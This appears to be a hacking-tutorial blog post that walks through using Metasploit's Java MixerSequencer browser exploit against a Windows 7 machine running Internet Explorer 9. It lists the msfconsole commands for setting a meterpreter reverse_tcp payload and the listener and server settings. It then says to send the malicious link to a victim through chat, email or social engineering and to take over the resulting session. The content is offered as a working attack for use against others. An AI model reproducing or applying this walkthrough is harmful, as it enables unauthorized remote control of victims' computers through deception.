Hack Windows PC with Java MixerSequencer Object GM_Song Structure Handling Vulnerability

This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability “ebx” points to a fake event in the MIDI file which stores the shell code. A “jmp ebx” from msvcr71.dll is used to make the exploit reliable over java updates.

Exploit Targets

Windows 7

Internet Explorer 9


Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_mixer_sequencer

Msf exploit (java_mixer_sequencer)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_mixer_sequencer) set lhost (IP of Local Host)

Msf exploit (java_mixer_sequencer)>set srvhost (This must be an address on the local machine)

Msf exploit (java_mixer_sequencer)>set uripath javamixer (The Url to use for this exploit)

Msf exploit (java_mixer_sequencer)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *